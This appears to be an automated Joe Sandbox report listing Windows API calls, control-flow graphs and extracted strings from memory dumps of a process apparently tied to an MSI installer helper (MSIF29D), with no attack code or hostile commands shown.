• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: AllocCommandCreateExitFileLineLocalProcess
• String ID: Full command line:
• API String ID: 1878577176-831861440

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 288 fb5e40-fb5ebc GetTokenInformation 289 fb5ebe-fb5ec7 GetLastError 288->289 290 fb5f20-fb5f33 288->290 289->290 291 fb5ec9-fb5ed7 289->291 292 fb5ed9-fb5edc 291->292 293 fb5ede 291->293 294 fb5f0b 292->294 295 fb5f0e-fb5f1a GetTokenInformation 293->295 296 fb5ee0-fb5ee7 293->296 294->295 295->290 297 fb5ee9-fb5ef5 call fb60d0 296->297 298 fb5ef7-fb5f08 call fd4080 296->298 297->295 298->294
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5EB4
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5EBE
                                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00FB5E18,8F6E4A30,?), ref: 00FB5F1A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2567405617-0

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 303 fe70bb-fe70c6 304 fe70c8-fe70d2 303->304 305 fe70d4-fe70da 303->305 304->305 306 fe7108-fe7113 call fd7370 304->306 307 fe70dc-fe70dd 305->307 308 fe70f3-fe7104 RtlAllocateHeap 305->308 312 fe7115-fe7117 306->312 307->308 309 fe70df-fe70e6 call fe5245 308->309 310 fe7106 308->310 309->306 316 fe70e8-fe70f1 call febf83 309->316 310->312 316->306 316->308
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00FE596A,00000001,00000364,?,00000006,000000FF,?,00FD6CE7,00000000,00FE3841,00000000), ref: 00FE70FC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 319 fb5940-fb596f 320 fb598f-fb59a0 319->320 321 fb5971-fb597f 319->321 322 fb5988 321->322 323 fb5981-fb5982 CloseHandle 321->323 322->320 323->322
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,8F6E4A30,00000000,?,?,?), ref: 00FB5982
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB57C0: GetCurrentProcess.KERNEL32(00000008,?,8F6E4A30,?,-00000010), ref: 00FB57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB57C0: OpenProcessToken.ADVAPI32(00000000), ref: 00FB57D7
                                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00FB4C15
                                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00FF72B0,00000000,00000004,01005104,00000000,?), ref: 00FB4C45
                                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FB5187
                                                                                                                                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00FB51B5
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 928366108-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00FBCBB6
                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0100E6D0,00000800), ref: 00FBCBD3
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: OpenQueryValue
                                                                                                                                                                                                                                                                      • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                                                                                                      • API String ID: 4153817207-482544602
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00FE42D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FEDEE5
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FE42D9,?,?,?,00000055,?,-00000050,?,?), ref: 00FEDF10
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FEDFA4
                                                                                                                                                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00FEDFB2
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FEE073
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                                                                      • API String ID: 4147378913-905460609
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,8F6E4A30,?), ref: 00FB38CB
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FB390B
                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(?,00000000), ref: 00FB395F
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00FB397A
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FB3A8E
                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(?,00000000), ref: 00FB3AA2
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00FB3AF0
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 708755948-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00FEE8D1,00000002,00000000,?,?,?,00FEE8D1,?,00000000), ref: 00FEE64C
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00FEE8D1,00000002,00000000,?,?,?,00FEE8D1,?,00000000), ref: 00FEE675
                                                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,?,00FEE8D1,?,00000000), ref: 00FEE68A
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                      • Opcode ID: 8024f0f72dabb7e6fbc3679a05922bd30924394c01fe0859ebcecb5cace217af
                                                                                                                                                                                                                                                                      • Instruction ID: b0d5fa9613e4d1d5b4c2ec19328f93323b43961a608afb78bfa8a242802f8a45
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8024f0f72dabb7e6fbc3679a05922bd30924394c01fe0859ebcecb5cace217af
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D21C432E20285A6DB308F16E900BA773A6AF74B74B568424E90AD7114E732DD40E750
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _swprintf$FreeLocal
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2429749586-0
                                                                                                                                                                                                                                                                      • Opcode ID: a00c8d408868e32c3298757a6b7ef591b14ce93fd34a58807442b2df4f0bd0ab
                                                                                                                                                                                                                                                                      • Instruction ID: 99fe22fa9f5bf0e41ea24b631354686c3cb96877d24e139db6b4e4e2825f6ec2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a00c8d408868e32c3298757a6b7ef591b14ce93fd34a58807442b2df4f0bd0ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F19A71D04219ABDB19DFA9DC40BEEBBB5FF08310F144229F911AB280D779A941DFA1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FEE894
                                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00FEE8DD
                                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00FEE8EC
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FEE934
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FEE953
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                                                                      • Opcode ID: c4ac0bad761eef0825e26a6ad484315c7cab22f57261335d8e11f56dc66961d2
                                                                                                                                                                                                                                                                      • Instruction ID: 9e70755a4146d494a9abe0638e6b8021dd5ca3335e61020cb0f7881f51984b9b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4ac0bad761eef0825e26a6ad484315c7cab22f57261335d8e11f56dc66961d2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83519371E00259AFEB20EFA6EC45ABE73B8FF48710F184065E914E7190D774DA04EB61
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                      • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                                      • Instruction ID: 4aecfaea1b6185569502e258352af61640a5ff21b0b50b604f236514faa1abf4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30B15772D046D59FDB258F69C881BFEBBA5EF58358F14816AE900EB341D234DD01EBA0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FD33B4
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00FD3480
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FD34A0
                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00FD34AA
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                                                      • Opcode ID: 493d87c015f04549534215ee96fb9a9919f8cc55fa74c89b18f99e225f24064a
                                                                                                                                                                                                                                                                      • Instruction ID: f9ff253ec0957cfbcff8006508c727a6d27805c530e2dea410d3c47249923f37
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 493d87c015f04549534215ee96fb9a9919f8cc55fa74c89b18f99e225f24064a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A313675D0531C9BDB10EFA0D989BCCBBB8AF08304F1040AAE50CAB250EB759B89DF45
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,8F6E4A30,?,00FF3D30,000000FF), ref: 00FBC657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBC630: GetLastError.KERNEL32(?,00000000,00000000,8F6E4A30,?,00FF3D30,000000FF), ref: 00FBC661
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,01008AF0), ref: 00FBD0D8
                                                                                                                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,01008AF0), ref: 00FBD0E7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBD0E2
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                      • API String ID: 3511171328-631824599
APIs
  • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
  • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE28B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE2D5
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE39B
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00FD6F13
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00FD6F1D
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00FD6F2A
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• LoadResource.KERNEL32(00000000,00000000,8F6E4A30,00000001,00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?), ref: 00FB45DB
• LockResource.KERNEL32(00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?,?,?,?,00FB3778), ref: 00FB45E6
• SizeofResource.KERNEL32(00000000,00000000,?,00000000,00FF4460,000000FF,?,00FB474D,00FB3778,?,00000000,00000000,?,?,?), ref: 00FB45F4
Similarity
• API ID: Resource$LoadLockSizeof
• String ID:
• API String ID: 2853612939-0
APIs
• GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00FE7F64,00000000,00000000,00000000), ref: 00FE7E23
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 565725191-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE84B8,?,?,00000008,?,?,00FF14E4,00000000), ref: 00FE86EA
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FD35BF
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
  • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEE4DE
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00FEE237,00000001,00000000,?,-00000050,?,00FEE868,00000000,?,?,?,00000055,?), ref: 00FEE183
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
APIs
  • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
  • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FEE453,00000000,00000000,?), ref: 00FEE6E5
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: ErrorLast$InfoLocale
APIs
  • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
  • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
• EnumSystemLocalesW.KERNEL32(00FEE48A,00000001,?,?,-00000050,?,00FEE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FEE1F6
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: ErrorLast$EnumLocalesSystem
APIs
  • Part of subcall function 00FE1C9A: EnterCriticalSection.KERNEL32(-0100DE50,?,00FE3576,?,0100A078,0000000C,00FE3841,?), ref: 00FE1CA9
• EnumSystemLocalesW.KERNEL32(00FE7125,00000001,0100A1D8,0000000C,00FE7554,00000000), ref: 00FE716A
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
APIs
  • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
  • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
• EnumSystemLocalesW.KERNEL32(00FEE01F,00000001,?,?,?,00FEE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FEE0FD
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: ErrorLast$EnumLocalesSystem
APIs
• GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00FD00E2,00000000,00000000,00000004,00FCED14,00000000,00000004,00FCF127,00000000,00000000), ref: 00FD2410
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
